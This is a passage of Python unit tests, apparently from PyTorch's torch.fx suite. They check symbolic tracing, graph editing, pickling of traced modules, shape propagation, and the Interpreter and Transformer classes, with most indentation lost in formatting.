def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
        nodes = list(graph.nodes)
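        # Node.append moves the get_attr node (nodes[2]) to just after the
        # add node (nodes[3]) that consumes it, creating a use-before-define
        # ordering that lint must reject.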
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
        output_shape : Optional[torch.Size] = None
        output_stride : Optional[Tuple[int, ...]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
        # Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
                return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
                return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = resnet18()
interp = Interpreter(symbolic_trace(rn18))
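        # The interpreter should drop intermediate values once their last use
        # has run; by the end, only the 'output' binding survives in env.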
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
                return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
                return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
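# Build a relu chain longer than Python's recursion limit; copy.deepcopy
# of the Graph must survive this, after which node users are checked
# against a map from original to copied nodes.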
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace', None)
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
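# Graph.graph_copy copies one graph's nodes into another and returns the
# value equivalent to the source graph's output; mapping the second graph's
# placeholder to that value stitches the two graphs together.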
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3), 6)
self.assertEqual(mod_false(3), 3)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertIn("Call using an FX-traced Module, line 4 of the "
"traced Module's generated forward function:",
captured[0])
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotIn("Call using an FX-traced Module, line 4 of the"
" traced Module's generated forward function:",
captured)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
